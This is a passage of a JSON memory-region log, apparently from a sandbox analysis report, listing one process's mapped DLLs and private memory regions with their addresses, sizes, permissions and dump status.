because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 31649791, "entry_point": 0, "filename": null, "id": "region_1088", "name": "pagefile_0x0000000001d50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30736384, "timestamp": "00:01:35.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1935671296, "type": "region", "version": 1 }, "end_va": 1935749119, "entry_point": 1935678783, "filename": "\\Windows\\SysWOW64\\dwmapi.dll", "id": "region_1089", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\syswow64\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1935671296, "timestamp": "00:01:35.999", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001090-addr_0x00000000002e0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_235", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 0, "filename": null, "id": "region_1090", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:01:36.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 31653888, "type": "region", "version": 1 }, "end_va": 34598911, "entry_point": 31653888, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1091", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 31653888, "timestamp": "00:01:36.005", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001092-addr_0x0000000000220000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_236", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_1092", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:01:36.016", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001093-addr_0x0000000002100000-size_0x000000000012f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_237", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1241088, "start_va": 34603008, "type": "region", "version": 1 }, "end_va": 35844095, "entry_point": 0, "filename": null, "id": "region_1093", "name": "private_0x0000000002100000", "norm_filename": null, "region_type": "private_memory", "start_va": 34603008, "timestamp": "00:01:36.019", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001094-addr_0x0000000000400000-size_0x0000000000042000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_238", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 270336, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4464639, "entry_point": 0, "filename": null, "id": "region_1094", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:36.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2297855, "entry_point": 0, "filename": null, "id": "region_1095", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:01:39.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1965948928, "type": "region", "version": 1 }, "end_va": 1967374335, "entry_point": 1966258749, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1096", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1965948928, "timestamp": "00:01:39.140", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001097-addr_0x0000000010000000-size_0x0000000000007000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_239", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 28672, "start_va": 268435456, "type": "region", "version": 1 }, "end_va": 268464127, "entry_point": 0, "filename": null, "id": "region_1097", "name": "private_0x0000000010000000", "norm_filename": null, "region_type": "private_memory", "start_va": 268435456, "timestamp": "00:01:39.149", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001098-addr_0x0000000000240000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_240", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2363391, "entry_point": 0, "filename": null, "id": "region_1098", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:39.151", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4042751, "entry_point": 3616992, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1112", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 3604480, "timestamp": "00:01:39.178", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001128-addr_0x00000000003e0000-size_0x0000000000018000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_242", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 98304, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4161535, "entry_point": 0, "filename": null, "id": "region_1128", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:01:39.200", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001129-addr_0x0000000000250000-size_0x0000000000007000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_243", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 28672, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2453503, "entry_point": 0, "filename": null, "id": "region_1129", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.203", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001130-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_244", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1130", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.204", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001131-addr_0x0000000000250000-size_0x0000000000002000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_245", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2433023, "entry_point": 0, "filename": null, "id": "region_1131", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.205", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001135-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_249", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1135", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.208", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001138-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_252", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1138", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.212", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001141-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_255", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1141", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.215", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001144-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_258", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1144", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.217", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001147-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_261", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1147", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.220", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001153-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_267", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1153", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.231", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001156-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_270", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1156", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.233", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001159-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_273", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1159", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001162-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_276", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1162", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.242", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001165-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_279", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1165", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.244", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001180-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_294", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1180", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.268", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001183-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_297", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1183", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.272", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001195-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_309", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1195", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.284", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001198-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_312", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1198", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.287", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001204-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_318", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1204", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.294", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001219-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_333", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1219", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.311", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001222-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_336", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1222", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.314", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001234-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_348", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1234", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.325", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001237-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_351", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1237", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.327", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001240-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_354", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1240", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.330", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001243-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_357", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1243", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.332", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001246-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_360", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1246", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.334", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001249-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_363", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1249", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.337", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001258-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_372", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1258", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.344", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001261-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_375", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1261", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001264-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_378", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1264", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.348", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001267-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_381", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1267", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.352", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001276-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_390", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1276", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.359", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001279-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_393", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1279", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.362", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001285-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_399", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1285", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.367", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001291-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_405", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1291", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.372", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001300-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_414", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1300", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.378", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001307-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_420", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1307", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.385", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001310-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_423", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1310", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.388", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001330-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_426", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1330", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", 